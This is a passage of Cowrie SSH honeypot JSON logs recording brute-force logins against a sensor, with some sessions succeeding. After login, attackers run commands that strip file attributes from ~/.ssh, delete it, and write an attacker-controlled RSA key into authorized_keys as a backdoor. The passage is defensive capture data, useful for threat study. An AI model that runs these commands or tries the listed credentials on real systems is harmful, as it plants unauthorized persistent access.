ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:28:04.684464Z","src_ip":"212.227.235.229","session":"f4cf82cfa7fb"}
{"eventid":"cowrie.login.failed","username":"tcpdump","password":"1234567890","message":"login attempt [tcpdump/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-09T06:28:05.128664Z","src_ip":"212.227.235.229","session":"f4cf82cfa7fb"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:28:06.241284Z","src_ip":"212.227.235.229","session":"f4cf82cfa7fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47971,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfb87e30a0b8","protocol":"ssh","message":"New connection: 212.227.235.229:47971 (1.2.3.4:22) [session: bfb87e30a0b8]","sensor":"my-vps","timestamp":"2025-09-09T06:28:06.974881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:28:06.975649Z","src_ip":"212.227.235.229","session":"bfb87e30a0b8"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:28:07.316240Z","src_ip":"212.227.235.229","session":"bfb87e30a0b8"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:28:07.775673Z","src_ip":"212.227.125.160","session":"97253eef0fa2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T06:28:08.731578Z","src_ip":"212.227.235.229","session":"bfb87e30a0b8"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:28:10.223637Z","src_ip":"212.227.235.229","session":"bfb87e30a0b8"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":44538,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2815802d5ef","protocol":"ssh","message":"New connection: 118.26.39.178:44538 (1.2.3.4:22) [session: d2815802d5ef]","sensor":"my-vps","timestamp":"2025-09-09T06:28:14.481888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:28:14.482744Z","src_ip":"118.26.39.178","session":"d2815802d5ef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:28:16.539875Z","src_ip":"118.26.39.178","session":"d2815802d5ef"}
{"eventid":"cowrie.login.success","username":"root","password":"123www-data","message":"login attempt [root/123www-data] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:28:17.315674Z","src_ip":"118.26.39.178","session":"d2815802d5ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:28:17.854266Z","src_ip":"118.26.39.178","session":"d2815802d5ef"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:28:17.855012Z","src_ip":"118.26.39.178","session":"d2815802d5ef"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:28:17.856207Z","src_ip":"118.26.39.178","session":"d2815802d5ef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:28:18.114752Z","src_ip":"118.26.39.178","session":"d2815802d5ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:28:19.273972Z","src_ip":"118.26.39.178","session":"d2815802d5ef"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:28:19.274760Z","src_ip":"118.26.39.178","session":"d2815802d5ef"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:28:19.536368Z","src_ip":"118.26.39.178","session":"d2815802d5ef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:28:19.537369Z","src_ip":"118.26.39.178","session":"d2815802d5ef"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":58088,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e3403bcf8c2","protocol":"ssh","message":"New connection: 118.26.39.178:58088 (1.2.3.4:22) [session: 9e3403bcf8c2]","sensor":"my-vps","timestamp":"2025-09-09T06:28:19.677916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:28:19.680183Z","src_ip":"118.26.39.178","session":"9e3403bcf8c2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:28:20.713254Z","src_ip":"118.26.39.178","session":"9e3403bcf8c2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:28:21.825467Z","src_ip":"118.26.39.178","session":"9e3403bcf8c2"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:28:23.029892Z","src_ip":"118.26.39.178","session":"9e3403bcf8c2"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":58102,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bc853309387","protocol":"ssh","message":"New connection: 118.26.39.178:58102 (1.2.3.4:22) [session: 5bc853309387]","sensor":"my-vps","timestamp":"2025-09-09T06:28:23.346713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:28:23.347797Z","src_ip":"118.26.39.178","session":"5bc853309387"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:28:23.604573Z","src_ip":"118.26.39.178","session":"5bc853309387"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:28:24.637479Z","src_ip":"118.26.39.178","session":"5bc853309387"}
{"eventid":"cowrie.session.closed","duration":"10.4","message":"Connection lost after 10.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:28:24.899252Z","src_ip":"118.26.39.178","session":"d2815802d5ef"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:28:24.900254Z","src_ip":"118.26.39.178","session":"5bc853309387"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52632,"dst_ip":"1.2.3.4","dst_port":22,"session":"7df2e4e52618","protocol":"ssh","message":"New connection: 212.227.235.229:52632 (1.2.3.4:22) [session: 7df2e4e52618]","sensor":"my-vps","timestamp":"2025-09-09T06:28:31.358920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:28:31.362034Z","src_ip":"212.227.235.229","session":"7df2e4e52618"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:28:31.705384Z","src_ip":"212.227.235.229","session":"7df2e4e52618"}
{"eventid":"cowrie.login.success","username":"root","password":"hashimoto","message":"login attempt [root/hashimoto] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:28:33.558114Z","src_ip":"212.227.235.229","session":"7df2e4e52618"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:28:34.304643Z","src_ip":"212.227.235.229","session":"7df2e4e52618"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:28:34.305490Z","src_ip":"212.227.235.229","session":"7df2e4e52618"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:28:34.306295Z","src_ip":"212.227.235.229","session":"7df2e4e52618"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:28:35.027245Z","src_ip":"212.227.235.229","session":"7df2e4e52618"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:28:35.433399Z","src_ip":"212.227.235.229","session":"7df2e4e52618"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:28:35.434226Z","src_ip":"212.227.235.229","session":"7df2e4e52618"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:28:35.817988Z","src_ip":"212.227.235.229","session":"7df2e4e52618"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:28:35.818945Z","src_ip":"212.227.235.229","session":"7df2e4e52618"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53859,"dst_ip":"1.2.3.4","dst_port":22,"session":"b65c8dacfbd3","protocol":"ssh","message":"New connection: 212.227.235.229:53859 (1.2.3.4:22) [session: b65c8dacfbd3]","sensor":"my-vps","timestamp":"2025-09-09T06:28:36.183208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:28:36.184041Z","src_ip":"212.227.235.229","session":"b65c8dacfbd3"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:28:36.537652Z","src_ip":"212.227.235.229","session":"b65c8dacfbd3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:28:38.386393Z","src_ip":"212.227.235.229","session":"b65c8dacfbd3"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:28:39.762490Z","src_ip":"212.227.235.229","session":"b65c8dacfbd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54667,"dst_ip":"1.2.3.4","dst_port":22,"session":"089c29e082f8","protocol":"ssh","message":"New connection: 212.227.235.229:54667 (1.2.3.4:22) [session: 089c29e082f8]","sensor":"my-vps","timestamp":"2025-09-09T06:28:40.215551Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:28:40.216323Z","src_ip":"212.227.235.229","session":"089c29e082f8"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2